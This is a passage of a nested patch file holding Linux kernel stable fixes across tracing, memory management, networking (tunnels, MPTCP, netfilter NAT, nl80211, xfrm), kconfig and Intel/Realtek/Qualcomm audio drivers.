+ 		    start >= (pg->records[pg->index - 1].ip + MCOUNT_INSN_SIZE))
+ 			continue;
+ 		rec = bsearch(&key, pg->records, pg->index,
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index f70765780ed3f..888980257340f 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -5120,6 +5120,8 @@ loff_t tracing_lseek(struct file *file, loff_t offset, int whence)
+ static const struct file_operations tracing_fops = {
+ 	.open		= tracing_open,
+ 	.read		= seq_read,
++	.read_iter	= seq_read_iter,
++	.splice_read	= generic_file_splice_read,
+ 	.write		= tracing_write_stub,
+ 	.llseek		= tracing_lseek,
+ 	.release	= tracing_release,
+diff --git a/kernel/trace/trace_events_hist.c b/kernel/trace/trace_events_hist.c
+index da3bfe8625d96..e3df03cdecbcb 100644
+--- a/kernel/trace/trace_events_hist.c
++++ b/kernel/trace/trace_events_hist.c
+@@ -1330,6 +1330,9 @@ static const char *hist_field_name(struct hist_field *field,
+ {
+ 	const char *field_name = "";
+ 
++	if (WARN_ON_ONCE(!field))
++		return field_name;
++
+ 	if (level > 1)
+ 		return field_name;
+ 
+diff --git a/kernel/trace/trace_hwlat.c b/kernel/trace/trace_hwlat.c
+index d440ddd5fd8b2..c4945f8adc119 100644
+--- a/kernel/trace/trace_hwlat.c
++++ b/kernel/trace/trace_hwlat.c
+@@ -492,6 +492,10 @@ static int start_cpu_kthread(unsigned int cpu)
+ {
+ 	struct task_struct *kthread;
+ 
++	/* Do not start a new hwlatd thread if it is already running */
++	if (per_cpu(hwlat_per_cpu_data, cpu).kthread)
++		return 0;
++
+ 	kthread = kthread_run_on_cpu(kthread_fn, NULL, cpu, "hwlatd/%u");
+ 	if (IS_ERR(kthread)) {
+ 		pr_err(BANNER "could not start sampling thread\n");
+@@ -584,9 +588,6 @@ static int start_per_cpu_kthreads(struct trace_array *tr)
+ 	 */
+ 	cpumask_and(current_mask, cpu_online_mask, tr->tracing_cpumask);
+ 
+-	for_each_online_cpu(cpu)
+-		per_cpu(hwlat_per_cpu_data, cpu).kthread = NULL;
+-
+ 	for_each_cpu(cpu, current_mask) {
+ 		retval = start_cpu_kthread(cpu);
+ 		if (retval)
+diff --git a/mm/huge_memory.c b/mm/huge_memory.c
+index 0729973d486a6..b8d654963df87 100644
+--- a/mm/huge_memory.c
++++ b/mm/huge_memory.c
+@@ -2004,7 +2004,7 @@ static void __split_huge_zero_page_pmd(struct vm_area_struct *vma,
+ {
+ 	struct mm_struct *mm = vma->vm_mm;
+ 	pgtable_t pgtable;
+-	pmd_t _pmd;
++	pmd_t _pmd, old_pmd;
+ 	int i;
+ 
+ 	/*
+@@ -2015,7 +2015,7 @@ static void __split_huge_zero_page_pmd(struct vm_area_struct *vma,
+ 	 *
+ 	 * See Documentation/mm/mmu_notifier.rst
+ 	 */
+-	pmdp_huge_clear_flush(vma, haddr, pmd);
++	old_pmd = pmdp_huge_clear_flush(vma, haddr, pmd);
+ 
+ 	pgtable = pgtable_trans_huge_withdraw(mm, pmd);
+ 	pmd_populate(mm, &_pmd, pgtable);
+@@ -2024,6 +2024,8 @@ static void __split_huge_zero_page_pmd(struct vm_area_struct *vma,
+ 		pte_t *pte, entry;
+ 		entry = pfn_pte(my_zero_pfn(haddr), vma->vm_page_prot);
+ 		entry = pte_mkspecial(entry);
++		if (pmd_uffd_wp(old_pmd))
++			entry = pte_mkuffd_wp(entry);
+ 		pte = pte_offset_map(&_pmd, haddr);
+ 		VM_BUG_ON(!pte_none(*pte));
+ 		set_pte_at(mm, haddr, pte, entry);
+diff --git a/mm/mincore.c b/mm/mincore.c
+index fa200c14185fc..1eb6aac88d845 100644
+--- a/mm/mincore.c
++++ b/mm/mincore.c
+@@ -33,7 +33,7 @@ static int mincore_hugetlb(pte_t *pte, unsigned long hmask, unsigned long addr,
+ 	 * Hugepages under user process are always in RAM and never
+ 	 * swapped out, but theoretically it needs to be checked.
+ 	 */
+-	present = pte && !huge_pte_none(huge_ptep_get(pte));
++	present = pte && !huge_pte_none_mostly(huge_ptep_get(pte));
+ 	for (; addr != end; vec++, addr += PAGE_SIZE)
+ 		*vec = present;
+ 	walk->private = vec;
+diff --git a/net/9p/client.c b/net/9p/client.c
+index 554a4b11f4fec..af59c3f2ec2e7 100644
+--- a/net/9p/client.c
++++ b/net/9p/client.c
+@@ -1284,7 +1284,7 @@ int p9_client_create_dotl(struct p9_fid *ofid, const char *name, u32 flags,
+ 		 qid->type, qid->path, qid->version, iounit);
+ 
+ 	memmove(&ofid->qid, qid, sizeof(struct p9_qid));
+-	ofid->mode = mode;
++	ofid->mode = flags;
+ 	ofid->iounit = iounit;
+ 
+ free_and_error:
+diff --git a/net/dsa/slave.c b/net/dsa/slave.c
+index a9fde48cffd43..5fe075bf479ec 100644
+--- a/net/dsa/slave.c
++++ b/net/dsa/slave.c
+@@ -1852,6 +1852,7 @@ int dsa_slave_change_mtu(struct net_device *dev, int new_mtu)
+ 	int new_master_mtu;
+ 	int old_master_mtu;
+ 	int mtu_limit;
++	int overhead;
+ 	int cpu_mtu;
+ 	int err;
+ 
+@@ -1880,9 +1881,10 @@ int dsa_slave_change_mtu(struct net_device *dev, int new_mtu)
+ 			largest_mtu = slave_mtu;
+ 	}
+ 
+-	mtu_limit = min_t(int, master->max_mtu, dev->max_mtu);
++	overhead = dsa_tag_protocol_overhead(cpu_dp->tag_ops);
++	mtu_limit = min_t(int, master->max_mtu, dev->max_mtu + overhead);
+ 	old_master_mtu = master->mtu;
+-	new_master_mtu = largest_mtu + dsa_tag_protocol_overhead(cpu_dp->tag_ops);
++	new_master_mtu = largest_mtu + overhead;
+ 	if (new_master_mtu > mtu_limit)
+ 		return -ERANGE;
+ 
+@@ -1917,8 +1919,7 @@ int dsa_slave_change_mtu(struct net_device *dev, int new_mtu)
+ 
+ out_port_failed:
+ 	if (new_master_mtu != old_master_mtu)
+-		dsa_port_mtu_change(cpu_dp, old_master_mtu -
+-				    dsa_tag_protocol_overhead(cpu_dp->tag_ops));
++		dsa_port_mtu_change(cpu_dp, old_master_mtu - overhead);
+ out_cpu_failed:
+ 	if (new_master_mtu != old_master_mtu)
+ 		dev_set_mtu(master, old_master_mtu);
+diff --git a/net/ipv4/fib_frontend.c b/net/ipv4/fib_frontend.c
+index b5736ef16ed2d..390f4be7f7bec 100644
+--- a/net/ipv4/fib_frontend.c
++++ b/net/ipv4/fib_frontend.c
+@@ -576,6 +576,9 @@ static int rtentry_to_fib_config(struct net *net, int cmd, struct rtentry *rt,
+ 			cfg->fc_scope = RT_SCOPE_UNIVERSE;
+ 	}
+ 
++	if (!cfg->fc_table)
++		cfg->fc_table = RT_TABLE_MAIN;
++
+ 	if (cmd == SIOCDELRT)
+ 		return 0;
+ 
+diff --git a/net/ipv4/inet_hashtables.c b/net/ipv4/inet_hashtables.c
+index cd8b2f7a8f341..f0750c06d5ffc 100644
+--- a/net/ipv4/inet_hashtables.c
++++ b/net/ipv4/inet_hashtables.c
+@@ -828,8 +828,14 @@ bool inet_bind2_bucket_match_addr_any(const struct inet_bind2_bucket *tb, const
+ #if IS_ENABLED(CONFIG_IPV6)
+ 	struct in6_addr addr_any = {};
+ 
+-	if (sk->sk_family != tb->family)
++	if (sk->sk_family != tb->family) {
++		if (sk->sk_family == AF_INET)
++			return net_eq(ib2_net(tb), net) && tb->port == port &&
++				tb->l3mdev == l3mdev &&
++				ipv6_addr_equal(&tb->v6_rcv_saddr, &addr_any);
++
+ 		return false;
++	}
+ 
+ 	if (sk->sk_family == AF_INET6)
+ 		return net_eq(ib2_net(tb), net) && tb->port == port &&
+diff --git a/net/ipv4/ip_tunnel.c b/net/ipv4/ip_tunnel.c
+index 019f3b0839c52..24961b304dad0 100644
+--- a/net/ipv4/ip_tunnel.c
++++ b/net/ipv4/ip_tunnel.c
+@@ -614,10 +614,10 @@ void ip_md_tunnel_xmit(struct sk_buff *skb, struct net_device *dev,
+ 	}
+ 
+ 	headroom += LL_RESERVED_SPACE(rt->dst.dev) + rt->dst.header_len;
+-	if (headroom > dev->needed_headroom)
+-		dev->needed_headroom = headroom;
++	if (headroom > READ_ONCE(dev->needed_headroom))
++		WRITE_ONCE(dev->needed_headroom, headroom);
+ 
+-	if (skb_cow_head(skb, dev->needed_headroom)) {
++	if (skb_cow_head(skb, READ_ONCE(dev->needed_headroom))) {
+ 		ip_rt_put(rt);
+ 		goto tx_dropped;
+ 	}
+@@ -800,10 +800,10 @@ void ip_tunnel_xmit(struct sk_buff *skb, struct net_device *dev,
+ 
+ 	max_headroom = LL_RESERVED_SPACE(rt->dst.dev) + sizeof(struct iphdr)
+ 			+ rt->dst.header_len + ip_encap_hlen(&tunnel->encap);
+-	if (max_headroom > dev->needed_headroom)
+-		dev->needed_headroom = max_headroom;
++	if (max_headroom > READ_ONCE(dev->needed_headroom))
++		WRITE_ONCE(dev->needed_headroom, max_headroom);
+ 
+-	if (skb_cow_head(skb, dev->needed_headroom)) {
++	if (skb_cow_head(skb, READ_ONCE(dev->needed_headroom))) {
+ 		ip_rt_put(rt);
+ 		dev->stats.tx_dropped++;
+ 		kfree_skb(skb);
+diff --git a/net/ipv4/tcp_output.c b/net/ipv4/tcp_output.c
+index c69f4d966024c..925594dbeb929 100644
+--- a/net/ipv4/tcp_output.c
++++ b/net/ipv4/tcp_output.c
+@@ -3608,7 +3608,7 @@ struct sk_buff *tcp_make_synack(const struct sock *sk, struct dst_entry *dst,
+ 	th->window = htons(min(req->rsk_rcv_wnd, 65535U));
+ 	tcp_options_write(th, NULL, &opts);
+ 	th->doff = (tcp_header_size >> 2);
+-	__TCP_INC_STATS(sock_net(sk), TCP_MIB_OUTSEGS);
++	TCP_INC_STATS(sock_net(sk), TCP_MIB_OUTSEGS);
+ 
+ #ifdef CONFIG_TCP_MD5SIG
+ 	/* Okay, we have all we need - do the md5 hash if needed */
+diff --git a/net/ipv6/ip6_tunnel.c b/net/ipv6/ip6_tunnel.c
+index 2fb4c6ad72432..afc922c88d179 100644
+--- a/net/ipv6/ip6_tunnel.c
++++ b/net/ipv6/ip6_tunnel.c
+@@ -1241,8 +1241,8 @@ route_lookup:
+ 	 */
+ 	max_headroom = LL_RESERVED_SPACE(dst->dev) + sizeof(struct ipv6hdr)
+ 			+ dst->header_len + t->hlen;
+-	if (max_headroom > dev->needed_headroom)
+-		dev->needed_headroom = max_headroom;
++	if (max_headroom > READ_ONCE(dev->needed_headroom))
++		WRITE_ONCE(dev->needed_headroom, max_headroom);
+ 
+ 	err = ip6_tnl_encap(skb, t, &proto, fl6);
+ 	if (err)
+diff --git a/net/iucv/iucv.c b/net/iucv/iucv.c
+index eb0295d900395..fc3fddeb6f36d 100644
+--- a/net/iucv/iucv.c
++++ b/net/iucv/iucv.c
+@@ -83,7 +83,7 @@ struct iucv_irq_data {
+ 	u16 ippathid;
+ 	u8  ipflags1;
+ 	u8  iptype;
+-	u32 res2[8];
++	u32 res2[9];
+ };
+ 
+ struct iucv_irq_list {
+diff --git a/net/mptcp/pm_netlink.c b/net/mptcp/pm_netlink.c
+index 5e38a0abbabae..1c69e476f4ad6 100644
+--- a/net/mptcp/pm_netlink.c
++++ b/net/mptcp/pm_netlink.c
+@@ -987,9 +987,13 @@ out:
+ 	return ret;
+ }
+ 
++static struct lock_class_key mptcp_slock_keys[2];
++static struct lock_class_key mptcp_keys[2];
++
+ static int mptcp_pm_nl_create_listen_socket(struct sock *sk,
+ 					    struct mptcp_pm_addr_entry *entry)
+ {
++	bool is_ipv6 = sk->sk_family == AF_INET6;
+ 	int addrlen = sizeof(struct sockaddr_in);
+ 	struct sockaddr_storage addr;
+ 	struct socket *ssock;
+@@ -1006,6 +1010,18 @@ static int mptcp_pm_nl_create_listen_socket(struct sock *sk,
+ 	if (!newsk)
+ 		return -EINVAL;
+ 
++	/* The subflow socket lock is acquired in a nested to the msk one
++	 * in several places, even by the TCP stack, and this msk is a kernel
++	 * socket: lockdep complains. Instead of propagating the _nested
++	 * modifiers in several places, re-init the lock class for the msk
++	 * socket to an mptcp specific one.
++	 */
++	sock_lock_init_class_and_name(newsk,
++				      is_ipv6 ? "mlock-AF_INET6" : "mlock-AF_INET",
++				      &mptcp_slock_keys[is_ipv6],
++				      is_ipv6 ? "msk_lock-AF_INET6" : "msk_lock-AF_INET",
++				      &mptcp_keys[is_ipv6]);
++
+ 	lock_sock(newsk);
+ 	ssock = __mptcp_nmpc_socket(mptcp_sk(newsk));
+ 	release_sock(newsk);
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index c4971bc42f60f..1e10a38ccf9d0 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -358,7 +358,6 @@ void mptcp_subflow_reset(struct sock *ssk)
+ 	/* must hold: tcp_done() could drop last reference on parent */
+ 	sock_hold(sk);
+ 
+-	tcp_set_state(ssk, TCP_CLOSE);
+ 	tcp_send_active_reset(ssk, GFP_ATOMIC);
+ 	tcp_done(ssk);
+ 	if (!test_and_set_bit(MPTCP_WORK_CLOSE_SUBFLOW, &mptcp_sk(sk)->flags) &&
+@@ -560,7 +559,7 @@ static struct request_sock_ops mptcp_subflow_v6_request_sock_ops __ro_after_init
+ static struct tcp_request_sock_ops subflow_request_sock_ipv6_ops __ro_after_init;
+ static struct inet_connection_sock_af_ops subflow_v6_specific __ro_after_init;
+ static struct inet_connection_sock_af_ops subflow_v6m_specific __ro_after_init;
+-static struct proto tcpv6_prot_override;
++static struct proto tcpv6_prot_override __ro_after_init;
+ 
+ static int subflow_v6_conn_request(struct sock *sk, struct sk_buff *skb)
+ {
+@@ -846,7 +845,7 @@ dispose_child:
+ }
+ 
+ static struct inet_connection_sock_af_ops subflow_specific __ro_after_init;
+-static struct proto tcp_prot_override;
++static struct proto tcp_prot_override __ro_after_init;
+ 
+ enum mapping_status {
+ 	MAPPING_OK,
+@@ -1376,6 +1375,13 @@ static void subflow_error_report(struct sock *ssk)
+ {
+ 	struct sock *sk = mptcp_subflow_ctx(ssk)->conn;
+ 
++	/* bail early if this is a no-op, so that we avoid introducing a
++	 * problematic lockdep dependency between TCP accept queue lock
++	 * and msk socket spinlock
++	 */
++	if (!sk->sk_socket)
++		return;
++
+ 	mptcp_data_lock(sk);
+ 	if (!sock_owned_by_user(sk))
+ 		__mptcp_error_report(sk);
+diff --git a/net/netfilter/nft_masq.c b/net/netfilter/nft_masq.c
+index 2a0adc497bbb4..026b4f87d96cc 100644
+--- a/net/netfilter/nft_masq.c
++++ b/net/netfilter/nft_masq.c
+@@ -43,7 +43,7 @@ static int nft_masq_init(const struct nft_ctx *ctx,
+ 			 const struct nft_expr *expr,
+ 			 const struct nlattr * const tb[])
+ {
+-	u32 plen = sizeof_field(struct nf_nat_range, min_addr.all);
++	u32 plen = sizeof_field(struct nf_nat_range, min_proto.all);
+ 	struct nft_masq *priv = nft_expr_priv(expr);
+ 	int err;
+ 
+diff --git a/net/netfilter/nft_nat.c b/net/netfilter/nft_nat.c
+index e5fd6995e4bf3..353c090f88917 100644
+--- a/net/netfilter/nft_nat.c
++++ b/net/netfilter/nft_nat.c
+@@ -226,7 +226,7 @@ static int nft_nat_init(const struct nft_ctx *ctx, const struct nft_expr *expr,
+ 		priv->flags |= NF_NAT_RANGE_MAP_IPS;
+ 	}
+ 
+-	plen = sizeof_field(struct nf_nat_range, min_addr.all);
++	plen = sizeof_field(struct nf_nat_range, min_proto.all);
+ 	if (tb[NFTA_NAT_REG_PROTO_MIN]) {
+ 		err = nft_parse_register_load(tb[NFTA_NAT_REG_PROTO_MIN],
+ 					      &priv->sreg_proto_min, plen);
+diff --git a/net/netfilter/nft_redir.c b/net/netfilter/nft_redir.c
+index 5086adfe731cb..5ed64b2bd15e8 100644
+--- a/net/netfilter/nft_redir.c
++++ b/net/netfilter/nft_redir.c
+@@ -48,7 +48,7 @@ static int nft_redir_init(const struct nft_ctx *ctx,
+ 	unsigned int plen;
+ 	int err;
+ 
+-	plen = sizeof_field(struct nf_nat_range, min_addr.all);
++	plen = sizeof_field(struct nf_nat_range, min_proto.all);
+ 	if (tb[NFTA_REDIR_REG_PROTO_MIN]) {
+ 		err = nft_parse_register_load(tb[NFTA_REDIR_REG_PROTO_MIN],
+ 					      &priv->sreg_proto_min, plen);
+@@ -235,7 +235,7 @@ static struct nft_expr_type nft_redir_inet_type __read_mostly = {
+ 	.name		= "redir",
+ 	.ops		= &nft_redir_inet_ops,
+ 	.policy		= nft_redir_policy,
+-	.maxattr	= NFTA_MASQ_MAX,
++	.maxattr	= NFTA_REDIR_MAX,
+ 	.owner		= THIS_MODULE,
+ };
+ 
+diff --git a/net/smc/smc_cdc.c b/net/smc/smc_cdc.c
+index 53f63bfbaf5f9..89105e95b4523 100644
+--- a/net/smc/smc_cdc.c
++++ b/net/smc/smc_cdc.c
+@@ -114,6 +114,9 @@ int smc_cdc_msg_send(struct smc_connection *conn,
+ 	union smc_host_cursor cfed;
+ 	int rc;
+ 
++	if (unlikely(!READ_ONCE(conn->sndbuf_desc)))
++		return -ENOBUFS;
++
+ 	smc_cdc_add_pending_send(conn, pend);
+ 
+ 	conn->tx_cdc_seq++;
+diff --git a/net/smc/smc_core.c b/net/smc/smc_core.c
+index c19d4b7c1f28a..0208dfb353456 100644
+--- a/net/smc/smc_core.c
++++ b/net/smc/smc_core.c
+@@ -1459,7 +1459,7 @@ static void __smc_lgr_terminate(struct smc_link_group *lgr, bool soft)
+ 	if (lgr->terminating)
+ 		return;	/* lgr already terminating */
+ 	/* cancel free_work sync, will terminate when lgr->freeing is set */
+-	cancel_delayed_work_sync(&lgr->free_work);
++	cancel_delayed_work(&lgr->free_work);
+ 	lgr->terminating = 1;
+ 
+ 	/* kill remaining link group connections */
+diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c
+index 4d4de49f7ab65..7320d676ce3a5 100644
+--- a/net/wireless/nl80211.c
++++ b/net/wireless/nl80211.c
+@@ -8815,7 +8815,7 @@ static bool cfg80211_off_channel_oper_allowed(struct wireless_dev *wdev,
+ 		struct cfg80211_chan_def *chandef;
+ 
+ 		chandef = wdev_chandef(wdev, link_id);
+-		if (!chandef)
++		if (!chandef || !chandef->chan)
+ 			continue;
+ 
+ 		/*
+@@ -10699,8 +10699,7 @@ static int nl80211_crypto_settings(struct cfg80211_registered_device *rdev,
+ 
+ static struct cfg80211_bss *nl80211_assoc_bss(struct cfg80211_registered_device *rdev,
+ 					      const u8 *ssid, int ssid_len,
+-					      struct nlattr **attrs,
+-					      const u8 **bssid_out)
++					      struct nlattr **attrs)
+ {
+ 	struct ieee80211_channel *chan;
+ 	struct cfg80211_bss *bss;
+@@ -10727,7 +10726,6 @@ static struct cfg80211_bss *nl80211_assoc_bss(struct cfg80211_registered_device
+ 	if (!bss)
+ 		return ERR_PTR(-ENOENT);
+ 
+-	*bssid_out = bssid;
+ 	return bss;
+ }
+ 
+@@ -10737,7 +10735,7 @@ static int nl80211_associate(struct sk_buff *skb, struct genl_info *info)
+ 	struct net_device *dev = info->user_ptr[1];
+ 	struct cfg80211_assoc_request req = {};
+ 	struct nlattr **attrs = NULL;
+-	const u8 *bssid, *ssid;
++	const u8 *ap_addr, *ssid;
+ 	unsigned int link_id;
+ 	int err, ssid_len;
+ 
+@@ -10874,6 +10872,7 @@ static int nl80211_associate(struct sk_buff *skb, struct genl_info *info)
+ 			return -EINVAL;
+ 
+ 		req.ap_mld_addr = nla_data(info->attrs[NL80211_ATTR_MLD_ADDR]);
++		ap_addr = req.ap_mld_addr;
+ 
+ 		attrs = kzalloc(attrsize, GFP_KERNEL);
+ 		if (!attrs)
+@@ -10899,8 +10898,7 @@ static int nl80211_associate(struct sk_buff *skb, struct genl_info *info)
+ 				goto free;
+ 			}
+ 			req.links[link_id].bss =
+-				nl80211_assoc_bss(rdev, ssid, ssid_len, attrs,
+-						  &bssid);
++				nl80211_assoc_bss(rdev, ssid, ssid_len, attrs);
+ 			if (IS_ERR(req.links[link_id].bss)) {
+ 				err = PTR_ERR(req.links[link_id].bss);
+ 				req.links[link_id].bss = NULL;
+@@ -10951,10 +10949,10 @@ static int nl80211_associate(struct sk_buff *skb, struct genl_info *info)
+ 		if (req.link_id >= 0)
+ 			return -EINVAL;
+ 
+-		req.bss = nl80211_assoc_bss(rdev, ssid, ssid_len, info->attrs,
+-					    &bssid);
++		req.bss = nl80211_assoc_bss(rdev, ssid, ssid_len, info->attrs);
+ 		if (IS_ERR(req.bss))
+ 			return PTR_ERR(req.bss);
++		ap_addr = req.bss->bssid;
+ 	}
+ 
+ 	err = nl80211_crypto_settings(rdev, info, &req.crypto, 1);
+@@ -10967,7 +10965,7 @@ static int nl80211_associate(struct sk_buff *skb, struct genl_info *info)
+ 			dev->ieee80211_ptr->conn_owner_nlportid =
+ 				info->snd_portid;
+ 			memcpy(dev->ieee80211_ptr->disconnect_bssid,
+-			       bssid, ETH_ALEN);
++			       ap_addr, ETH_ALEN);
+ 		}
+ 
+ 		wdev_unlock(dev->ieee80211_ptr);
+diff --git a/net/xfrm/xfrm_state.c b/net/xfrm/xfrm_state.c
+index 0f88cb6fc3c22..2f4cf976b59a3 100644
+--- a/net/xfrm/xfrm_state.c
++++ b/net/xfrm/xfrm_state.c
+@@ -2649,11 +2649,6 @@ int __xfrm_init_state(struct xfrm_state *x, bool init_replay, bool offload,
+ 			goto error;
+ 		}
+ 
+-		if (!(inner_mode->flags & XFRM_MODE_FLAG_TUNNEL)) {
+-			NL_SET_ERR_MSG(extack, "Only tunnel modes can accommodate an AF_UNSPEC selector");
+-			goto error;
+-		}
+-
+ 		x->inner_mode = *inner_mode;
+ 
+ 		if (x->props.family == AF_INET)
+diff --git a/scripts/kconfig/confdata.c b/scripts/kconfig/confdata.c
+index b7c9f1dd5e422..992575f1e9769 100644
+--- a/scripts/kconfig/confdata.c
++++ b/scripts/kconfig/confdata.c
+@@ -1226,10 +1226,12 @@ static void (*conf_changed_callback)(void);
+ 
+ void conf_set_changed(bool val)
+ {
+-	if (conf_changed_callback && conf_changed != val)
+-		conf_changed_callback();
++	bool changed = conf_changed != val;
+ 
+ 	conf_changed = val;
++
++	if (conf_changed_callback && changed)
++		conf_changed_callback();
+ }
+ 
+ bool conf_get_changed(void)
+diff --git a/sound/hda/intel-dsp-config.c b/sound/hda/intel-dsp-config.c
+index ae31bb1275940..317bdf6dcbef4 100644
+--- a/sound/hda/intel-dsp-config.c
++++ b/sound/hda/intel-dsp-config.c
+@@ -472,6 +472,15 @@ static const struct config_entry config_table[] = {
+ 	},
+ #endif
+ 
++/* Meteor Lake */
++#if IS_ENABLED(CONFIG_SND_SOC_SOF_METEORLAKE)
++	/* Meteorlake-P */
++	{
++		.flags = FLAG_SOF | FLAG_SOF_ONLY_IF_DMIC_OR_SOUNDWIRE,
++		.device = 0x7e28,
++	},
++#endif
++
+ };
+ 
+ static const struct config_entry *snd_intel_dsp_find_config
+diff --git a/sound/pci/hda/hda_intel.c b/sound/pci/hda/hda_intel.c
+index 81c4a45254ff2..77a592f219472 100644
+--- a/sound/pci/hda/hda_intel.c
++++ b/sound/pci/hda/hda_intel.c
+@@ -328,14 +328,15 @@ enum {
+ #define needs_eld_notify_link(chip)	false
+ #endif
+ 
+-#define CONTROLLER_IN_GPU(pci) (((pci)->device == 0x0a0c) || \
++#define CONTROLLER_IN_GPU(pci) (((pci)->vendor == 0x8086) &&         \
++				       (((pci)->device == 0x0a0c) || \
+ 					((pci)->device == 0x0c0c) || \
+ 					((pci)->device == 0x0d0c) || \
+ 					((pci)->device == 0x160c) || \
+ 					((pci)->device == 0x490d) || \
+ 					((pci)->device == 0x4f90) || \
+ 					((pci)->device == 0x4f91) || \
+-					((pci)->device == 0x4f92))
++					((pci)->device == 0x4f92)))
+ 
+ #define IS_BXT(pci) ((pci)->vendor == 0x8086 && (pci)->device == 0x5a98)
+ 
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index d4819890374b5..28ac6c159b2a2 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9446,6 +9446,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8b8a, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b8b, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b8d, "HP", ALC236_FIXUP_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b8f, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b92, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8bf0, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x1043, 0x103e, "ASUS X540SA", ALC256_FIXUP_ASUS_MIC),
+@@ -9538,6 +9539,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x144d, 0xc830, "Samsung Galaxy Book Ion (NT950XCJ-X716A)", ALC298_FIXUP_SAMSUNG_AMP),
+ 	SND_PCI_QUIRK(0x144d, 0xc832, "Samsung Galaxy Book Flex Alpha (NP730QCJ)", ALC256_FIXUP_SAMSUNG_HEADPHONE_VERY_QUIET),
+ 	SND_PCI_QUIRK(0x144d, 0xca03, "Samsung Galaxy Book2 Pro 360 (NP930QED)", ALC298_FIXUP_SAMSUNG_AMP),
++	SND_PCI_QUIRK(0x144d, 0xc868, "Samsung Galaxy Book2 Pro (NP930XED)", ALC298_FIXUP_SAMSUNG_AMP),
+ 	SND_PCI_QUIRK(0x1458, 0xfa53, "Gigabyte BXBT-2807", ALC283_FIXUP_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1462, 0xb120, "MSI Cubi MS-B120", ALC283_FIXUP_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1462, 0xb171, "Cubi N 8GL (MS-B171)", ALC283_FIXUP_HEADSET_MIC),
+diff --git a/sound/soc/intel/common/soc-acpi-intel-adl-match.c b/sound/soc/intel/common/soc-acpi-intel-adl-match.c
+index 68b4fa352354d..0102574025e90 100644
+--- a/sound/soc/intel/common/soc-acpi-intel-adl-match.c
++++ b/sound/soc/intel/common/soc-acpi-intel-adl-match.c
+@@ -547,7 +547,7 @@ struct snd_soc_acpi_mach snd_soc_acpi_intel_adl_machines[] = {
+ 	{
+ 		.comp_ids = &essx_83x6,
+ 		.drv_name = "sof-essx8336",
+-		.sof_tplg_filename = "sof-adl-es83x6", /* the tplg suffix is added at run time */
++		.sof_tplg_filename = "sof-adl-es8336", /* the tplg suffix is added at run time */
+ 		.tplg_quirk_mask = SND_SOC_ACPI_TPLG_INTEL_SSP_NUMBER |
+ 					SND_SOC_ACPI_TPLG_INTEL_SSP_MSB |
+ 					SND_SOC_ACPI_TPLG_INTEL_DMIC_NUMBER,
+diff --git a/sound/soc/qcom/qdsp6/q6prm.c b/sound/soc/qcom/qdsp6/q6prm.c
+index cda33ded29bed..41a29047ff010 100644
+--- a/sound/soc/qcom/qdsp6/q6prm.c
++++ b/sound/soc/qcom/qdsp6/q6prm.c
+@@ -183,9 +183,9 @@ int q6prm_set_lpass_clock(struct device *dev, int clk_id, int clk_attr, int clk_
+ 			  unsigned int freq)
+ {
+ 	if (freq)
+-		return q6prm_request_lpass_clock(dev, clk_id, clk_attr, clk_attr, freq);
++		return q6prm_request_lpass_clock(dev, clk_id, clk_attr, clk_root, freq);
+ 
+-	return q6prm_release_lpass_clock(dev, clk_id, clk_attr, clk_attr, freq);
++	return q6prm_release_lpass_clock(dev, clk_id, clk_attr, clk_root, freq);
+ }
+ EXPORT_SYMBOL_GPL(q6prm_set_lpass_clock);
+ 
+diff --git a/sound/soc/sof/intel/pci-apl.c b/sound/soc/sof/intel/pci-apl.c
+index 998e219011f01..ad8431b13125d 100644
+--- a/sound/soc/sof/intel/pci-apl.c
++++ b/sound/soc/sof/intel/pci-apl.c
+@@ -72,6 +72,7 @@ static const struct sof_dev_desc glk_desc = {
+ 	.nocodec_tplg_filename = "sof-glk-nocodec.tplg",
+ 	.ops = &sof_apl_ops,
+ 	.ops_init = sof_apl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ /* PCI IDs */
+diff --git a/sound/soc/sof/intel/pci-cnl.c b/sound/soc/sof/intel/pci-cnl.c
+index c797356f7028b..33677ce8de41d 100644
+--- a/sound/soc/sof/intel/pci-cnl.c
++++ b/sound/soc/sof/intel/pci-cnl.c
+@@ -45,6 +45,7 @@ static const struct sof_dev_desc cnl_desc = {
+ 	.nocodec_tplg_filename = "sof-cnl-nocodec.tplg",
+ 	.ops = &sof_cnl_ops,
+ 	.ops_init = sof_cnl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ static const struct sof_dev_desc cfl_desc = {
+@@ -102,6 +103,7 @@ static const struct sof_dev_desc cml_desc = {
+ 	.nocodec_tplg_filename = "sof-cnl-nocodec.tplg",
+ 	.ops = &sof_cnl_ops,
+ 	.ops_init = sof_cnl_ops_init,
++	.ops_free = hda_ops_free,
+ };
+ 
+ /* PCI IDs */
+diff --git a/sound/soc/sof/intel/pci-icl.c b/sound/soc/sof/intel/pci-icl.c
+index 48f24f8ace261..9a42a4ea1a5ea 100644
+--- a/sound/soc/sof/intel/pci-icl.c
++++ b/sound/soc/sof/intel/pci-icl.c
+@@ -73,6 +73,7 @@ static const struct sof_dev_desc jsl_desc = {
+ 	.nocodec_tplg_filename = "sof-jsl-nocodec.tplg",
